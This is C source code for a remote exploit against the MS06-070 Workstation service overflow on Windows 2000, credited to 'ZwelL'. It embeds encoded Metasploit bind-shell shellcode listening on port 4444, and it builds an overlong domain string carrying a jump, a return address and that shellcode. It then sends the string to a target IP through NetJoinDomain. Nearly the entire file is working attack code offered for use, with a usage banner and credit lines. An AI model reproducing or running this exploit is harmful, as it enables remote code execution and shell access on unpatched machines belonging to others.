#include <windows.h>
#include <stdio.h>
#include <lm.h>

#pragma comment(lib, "netapi32")

/* win32_bind - EXITFUNC=thread LPORT=4444 Size=344 Encoder=PexFnstenvSub http://metasploit.com */
unsigned char scode[] =
"\x29\xc9\x83\xe9\xb0\xd9\xee\xd9\x74\x24\xf4\x5b\x81\x73\x13\x7e"
"\xe8\x56\xc8\x83\xeb\xfc\xe2\xf4\x82\x82\xbd\x85\x96\x11\xa9\x37"
"\x81\x88\xdd\xa4\x5a\xcc\xdd\x8d\x42\x63\x2a\xcd\x06\xe9\xb9\x43"
"\x31\xf0\xdd\x97\x5e\xe9\xbd\x81\xf5\xdc\xdd\xc9\x90\xd9\x96\x51"
"\xd2\x6c\x96\xbc\x79\x29\x9c\xc5\x7f\x2a\xbd\x3c\x45\xbc\x72\xe0"
"\x0b\x0d\xdd\x97\x5a\xe9\xbd\xae\xf5\xe4\x1d\x43\x21\xf4\x57\x23"
"\x7d\xc4\xdd\x41\x12\xcc\x4a\xa9\xbd\xd9\x8d\xac\xf5\xab\x66\x43"
"\x3e\xe4\xdd\xb8\x62\x45\xdd\x88\x76\xb6\x3e\x46\x30\xe6\xba\x98"
"\x81\x3e\x30\x9b\x18\x80\x65\xfa\x16\x9f\x25\xfa\x21\xbc\xa9\x18"
"\x16\x23\xbb\x34\x45\xb8\xa9\x1e\x21\x61\xb3\xae\xff\x05\x5e\xca"
"\x2b\x82\x54\x37\xae\x80\x8f\xc1\x8b\x45\x01\x37\xa8\xbb\x05\x9b"
"\x2d\xbb\x15\x9b\x3d\xbb\xa9\x18\x18\x80\x47\x94\x18\xbb\xdf\x29"
"\xeb\x80\xf2\xd2\x0e\x2f\x01\x37\xa8\x82\x46\x99\x2b\x17\x86\xa0"
"\xda\x45\x78\x21\x29\x17\x80\x9b\x2b\x17\x86\xa0\x9b\xa1\xd0\x81"
"\x29\x17\x80\x98\x2a\xbc\x03\x37\xae\x7b\x3e\x2f\x07\x2e\x2f\x9f"
"\x81\x3e\x03\x37\xae\x8e\x3c\xac\x18\x80\x35\xa5\xf7\x0d\x3c\x98"
"\x27\xc1\x9a\x41\x99\x82\x12\x41\x9c\xd9\x96\x3b\xd4\x16\x14\xe5"
"\x80\xaa\x7a\x5b\xf3\x92\x6e\x63\xd5\x43\x3e\xba\x80\x5b\x40\x37"
"\x0b\xac\xa9\x1e\x25\xbf\x04\x99\x2f\xb9\x3c\xc9\x2f\xb9\x03\x99"
"\x81\x38\x3e\x65\xa7\xed\x98\x9b\x81\x3e\x3c\x37\x81\xdf\xa9\x18"
"\xf5\xbf\xaa\x4b\xba\x8c\xa9\x1e\x2c\x17\x86\xa0\x91\x26\xb6\xa8"
"\x2d\x17\x80\x37\xae\xe8\x56\xc8";

void print_line(char *line)
{
#define LINELEN 60
int space = (LINELEN - strlen(line))/2;
char *spacechar = (char *)malloc(space+1);
char *otherchar = (char *)malloc(LINELEN-space-strlen(line)+1);
if(line[0] == '=')
{
memset(spacechar, '=', space);
memset(otherchar, '=', LINELEN-space-strlen(line));
}
else
{
memset(spacechar, ' ', space);
memset(otherchar, ' ', LINELEN-space-strlen(line));
}
spacechar[space]=0;
otherchar[LINELEN-space-strlen(line)]=0;
printf("=%s%s%s=\r\n", spacechar, line, otherchar);
free(spacechar);
free(otherchar);
}

void printusage()
{
print_line("==========================================");
print_line("MS06070 exploit for Win2K");
print_line("Coded By ZwelL");
print_line("zwell@sohu.com");
print_line("http://www.nosec.org");
print_line("2006.11.15");
print_line("==========================================");
}

char *buildbuf(int _len, wchar_t *prec)
{
int len = (_len/5)*5;
int pos = wcslen(prec)*2;
char *retstr = (char *)malloc(len+pos+2);
memset(retstr, 0, len+pos+2);
memcpy(retstr, prec, pos);
for(int i=11111; i<11111+len/5; i++)
{
itoa(i, &retstr[(i-11111)*5+pos], 10);
}

*(DWORD *)&retstr[(11535-11111)*5+pos] = 0x04eb06eb;
*(DWORD *)&retstr[(11535-11111)*5+pos+4] = 0x7801e85c;//xpret address
memcpy(&retstr[(11535-11111)*5+pos+4+4], scode, sizeof(scode));
return retstr;
}

int main(int argc, char **argv)
{
char szIp[20];
wchar_t wip[20];
char *prec;
wchar_t *domain;
wchar_t *wprec;
NET_API_STATUS st;

printusage();
if(argc < 3)
{
printf("Usage : %s <ip> <domain>\n", argv[0]);
return 0;
}

sprintf(szIp, "\\\\%s", argv[1]);
mbstowcs(wip, szIp, strlen(szIp)+1);

prec = (char *)malloc(strlen(argv[2])+1+1);
wprec = (wchar_t *)malloc(2*(strlen(argv[2])+1+1));
sprintf(prec, "%s\\", argv[2]);
mbstowcs(wprec, prec, strlen(prec)+1);

domain = (wchar_t *)buildbuf(4000, wprec);

//printf("%ws", wprec);
st = NetJoinDomain(wip, domain, NULL, NULL, NULL, NETSETUP_JOIN_DOMAIN | NETSETUP_DOMAIN_JOIN_IF_JOINED);
//st = NetJoinDomain(L"\\\\192.168.1.173", L"Test\\test", NULL, NULL, NULL, NETSETUP_JOIN_DOMAIN | NETSETUP_DOMAIN_JOIN_IF_JOINED);
if(NERR_Success != st)
{
printf("Error : %d\n", st );
}
else
{
printf("ok");
}

free(domain);
free(prec);
free(wprec);
}

thanks x140t14n
Power by 520king.com